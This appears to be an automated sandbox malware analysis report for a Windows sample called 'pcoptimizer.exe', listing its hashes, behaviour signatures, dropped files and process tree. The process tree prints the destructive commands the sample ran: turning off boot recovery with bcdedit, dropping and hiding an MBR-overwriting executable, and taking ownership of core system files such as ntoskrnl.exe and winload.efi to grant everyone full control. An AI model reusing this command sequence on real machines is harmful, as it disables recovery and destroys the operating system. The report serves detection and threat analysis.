Analysis
-
max time kernel
0s -
platform
windows11-21h2_x64 -
resource
win11-20240508-en -
resource tags
arch:x64arch:x86image:win11-20240508-enlocale:en-usos:windows11-21h2-x64system -
submitted
01-07-2024 02:23
Static task
static1
Behavioral task
behavioral1
Sample
pcoptimizer.exe
Resource
win11-20240508-en
Errors
General
-
Target
pcoptimizer.exe
-
Size
212KB
-
MD5
eeaef69144b4ff2e3fb398bb0c880dbe
-
SHA1
69c4958b752e615f829cb50846a651b996ec9b9d
-
SHA256
b308979b80ff6586c755a2e72fb988819ae4b50fb021ab0d1f27b0c6899d2bc1
-
SHA512
5a5ec302a4f379244e757967c759a988844e35be2edfe19c705641ca3bbaa48d1b948c58046d51fe95a927cbc89539bef583549807bd04a6a4381ebf3d1fb0f9
-
SSDEEP
6144:at5hBPi0BW69hd1MMdxPe9N9uA069TBZlU25hFDaXb0:atzww69T7q25zDP
Malware Config
Signatures
-
Modifies boot configuration data using bcdedit 1 TTPs 1 IoCs
-
Possible privilege escalation attempt 14 IoCs
Processes:
takeown.exetakeown.exetakeown.exeicacls.exeicacls.exetakeown.exetakeown.exeicacls.exeicacls.exetakeown.exetakeown.exeicacls.exeicacls.exeicacls.exepid process 1828 takeown.exe 4236 takeown.exe 3132 takeown.exe 3260 icacls.exe 4856 icacls.exe 4544 takeown.exe 4708 takeown.exe 5116 icacls.exe 400 icacls.exe 4264 takeown.exe 2188 takeown.exe 1152 icacls.exe 3768 icacls.exe 4604 icacls.exe -
Sets file to hidden 1 TTPs 1 IoCs
Modifies file attributes to stop it showing in Explorer etc.
-
Executes dropped EXE 1 IoCs
Processes:
mbr.exepid process 4088 mbr.exe -
Modifies file permissions 1 TTPs 14 IoCs
Processes:
icacls.exeicacls.exetakeown.exetakeown.exetakeown.exeicacls.exetakeown.exetakeown.exeicacls.exeicacls.exeicacls.exetakeown.exeicacls.exetakeown.exepid process 4856 icacls.exe 1152 icacls.exe 4236 takeown.exe 4264 takeown.exe 2188 takeown.exe 3260 icacls.exe 4544 takeown.exe 4708 takeown.exe 400 icacls.exe 3768 icacls.exe 4604 icacls.exe 3132 takeown.exe 5116 icacls.exe 1828 takeown.exe -
File and Directory Permissions Modification: Windows File and Directory Permissions Modification 1 TTPs
-
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
Processes:
mbr.exedescription ioc process File opened for modification \??\PhysicalDrive0 mbr.exe -
Drops file in System32 directory 3 IoCs
Processes:
cmd.exeattrib.exedescription ioc process File created C:\Windows\System32\mbr.exe cmd.exe File opened for modification C:\Windows\System32\mbr.exe cmd.exe File opened for modification C:\Windows\System32\mbr.exe attrib.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Kills process with taskkill 1 IoCs
Processes:
taskkill.exepid process 4204 taskkill.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
takeown.exedescription pid process Token: SeTakeOwnershipPrivilege 4264 takeown.exe -
Suspicious use of WriteProcessMemory 13 IoCs
Processes:
pcoptimizer.execmd.exedescription pid process target process PID 3692 wrote to memory of 1404 3692 pcoptimizer.exe cmd.exe PID 3692 wrote to memory of 1404 3692 pcoptimizer.exe cmd.exe PID 1404 wrote to memory of 1508 1404 cmd.exe bcdedit.exe PID 1404 wrote to memory of 1508 1404 cmd.exe bcdedit.exe PID 1404 wrote to memory of 4784 1404 cmd.exe attrib.exe PID 1404 wrote to memory of 4784 1404 cmd.exe attrib.exe PID 1404 wrote to memory of 4088 1404 cmd.exe mbr.exe PID 1404 wrote to memory of 4088 1404 cmd.exe mbr.exe PID 1404 wrote to memory of 4088 1404 cmd.exe mbr.exe PID 1404 wrote to memory of 4264 1404 cmd.exe takeown.exe PID 1404 wrote to memory of 4264 1404 cmd.exe takeown.exe PID 1404 wrote to memory of 400 1404 cmd.exe icacls.exe PID 1404 wrote to memory of 400 1404 cmd.exe icacls.exe -
Views/modifies file attributes 1 TTPs 1 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\pcoptimizer.exe"C:\Users\Admin\AppData\Local\Temp\pcoptimizer.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\4016.tmp\4017.tmp\4018.bat C:\Users\Admin\AppData\Local\Temp\pcoptimizer.exe"2⤵
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled no3⤵
- Modifies boot configuration data using bcdedit
-
C:\Windows\system32\attrib.exeattrib +s +h C:\Windows\System32\mbr.exe3⤵
- Sets file to hidden
- Drops file in System32 directory
- Views/modifies file attributes
-
C:\Windows\System32\mbr.exeC:\Windows\System32\mbr.exe3⤵
- Executes dropped EXE
- Writes to the Master Boot Record (MBR)
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32\ntoskrnl.exe"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\System32\ntoskrnl.exe" /grant everyone:F3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32\hal.dll"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\System32\hal.dll" /grant everyone:F3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32\ci.dll"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\System32\ci.dll" /grant everyone:F3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32\winload.efi"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\System32\winload.efi" /grant everyone:F3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\takeown.exetakeown /f "C:\Program Files\WindowsApps"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\WindowsApps" /grant everyone:F3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\SystemApps"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\SystemApps" /grant everyone:F3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\ImmersiveControlPanel"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\ImmersiveControlPanel" /grant everyone:F3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\taskkill.exetaskkill /f /im discord.exe3⤵
- Kills process with taskkill
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell wininit3⤵
-
C:\Windows\system32\wininit.exe"C:\Windows\system32\wininit.exe"4⤵
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\4016.tmp\4017.tmp\4018.batFilesize
1KB
MD5c076d53a79bdea72d3252f6e7eabec00
SHA1bd016c13f09b771218cbb2fed51d0d9c722f439d
SHA256de3b425e1d62e1d24b9cef8e46a06b00ad08ee3bd08e9e99499de13f7043eb9f
SHA512f8b18940bb8b61a23d9b700913dc6336bff5b309bca30012bf9d62a06d8c7df2c2e0adccf9670c120bb4b707e2cdbe3587fce266a6bb0409b3e5caee9011f6bd
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qhufzkx1.qpq.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Windows\System32\mbr.exeFilesize
47KB
MD58562ed46d745dceb3cc268693ca25c83
SHA1309067f0c9703084654495a47e67f7a40824700d
SHA256ea5d21e6598d52b30e9d055bc406c6227bbadb5c493addb27b32fb16a6dcae8c
SHA51252f23e70f7ea6eab1a50a4008e563d787732f7361dfe10c48f39dae42bce023c90449c9a903733fab13c49b50f8c4fa7d4864ab26c69326aab0149c765fd677b
-
memory/776-15-0x0000018EF2530000-0x0000018EF2552000-memory.dmpFilesize
136KB
-
memory/4088-9-0x0000000000400000-0x0000000000412000-memory.dmpFilesize
72KB